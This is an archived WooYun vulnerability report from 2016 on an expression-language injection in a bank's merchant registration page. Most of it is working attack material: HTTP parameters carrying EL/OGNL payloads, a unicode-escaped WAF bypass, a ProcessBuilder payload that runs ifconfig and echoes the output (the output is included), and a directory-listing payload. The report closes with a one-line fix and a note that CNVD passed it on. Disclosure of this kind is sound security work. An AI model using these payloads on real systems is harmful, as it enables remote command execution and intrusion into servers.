乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-04-14: 细节已通知厂商并且等待厂商处理中 2016-04-18: 厂商已经确认,细节仅向厂商公开 2016-04-28: 细节向核心白帽子及相关领域专家公开 2016-05-08: 细节向普通白帽子公开 2016-05-18: 细节向实习白帽子公开 2016-06-02: 细节向公众公开
这个漏洞只影响有钱人,乌云欠我一个闪电
#1 漏洞描述EL表达式语法允许开发人员开发自定义函数,以调用Java类的方法#2 影响服务器http://**.**.**.**/merchant/enterprise/registerComUserForward.jhtml#3 Paylod
groupName=1&papersType=${9999999-444}&papersValue=1&baseacct=1&retMsg=1&retCode=1
#4 绕过WAF
http://**.**.**.**/merchant/enterprise/registerComUserForward.jhtmlcompanyName=999&groupName=&papersType=${"a9999abbb".toString\u0028\u0029}&papersValue=1&baseacct=1&retMsg=1&retCode=1
#5 回显命令执行
groupName=1&papersType=${%23a%3d\u0028new%20java.lang.ProcessBuilder\u0028new%20java.lang.String[]{\u0027/sbin/ifconfig\u0027,\u0027-a\u0027}\u0029\u0029.start\u0028\u0029,%23b%3d%23a.getInputStream\u0028\u0029,%23c%3dnew%**.**.**.**.InputStreamReader\u0028%23b\u0029,%23d%3dnew%**.**.**.**.BufferedReader\u0028%23c\u0029,%23e%3dnew%20char[50000],%23d.read\u0028%23e\u0029,%23ringzero%3d%23context.get\u0028\u0027com.opensymphony.xwork2.dispatcher.HttpServletResponse\u0027\u0029,%23ringzero.getWriter\u0028\u0029.println\u0028%23e\u0029,%23ringzero.getWriter\u0028\u0029.flush\u0028\u0029,%23ringzero.getWriter\u0028\u0029.close\u0028\u0029}&papersValue=1&baseacct=1&retMsg=1&retCode=1
${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'/sbin/ifconfig','-a'})).start(),#b=#a.getInputStream(),#c=new **.**.**.**.InputStreamReader(#b),#d=new **.**.**.**.BufferedReader(#c),#e=new char[50000],#d.read(#e),#ringzero=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#ringzero.getWriter().println(#e),#ringzero.getWriter().flush(),#ringzero.getWriter().close()}
eth5 Link encap:Ethernet HWaddr 00:50:56:97:7A:74 inet addr:**.**.**.** Bcast:**.**.**.** Mask:**.**.**.** UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:5603928546 errors:0 dropped:0 overruns:0 frame:0 TX packets:8131434126 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:735168104896 (701110.9 Mb) TX bytes:11750604019014 (11206249.2 Mb)lo Link encap:Local Loopback inet addr:**.**.**.** Mask:**.**.**.** UP LOOPBACK RUNNING MTU:16436 Metric:1 RX packets:51371053 errors:0 dropped:0 overruns:0 frame:0 TX packets:51371053 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:25387430681 (24211.3 Mb) TX bytes:25387430681 (24211.3 Mb)
#6 列目录
groupName=1&papersType=${new **.**.**.**.File(\u0027/\u0027).listFiles()[1]}&papersValue=1&baseacct=1&retMsg=1&retCode=1
# 表达式不允许来自客户端调用
危害等级:高
漏洞Rank:10
确认时间:2016-04-18 15:23
CNVD确认并复现所述情况,已经转由CNCERT直接通报给对应银行集团公司,由其后续协调网站管理部门处置.
暂无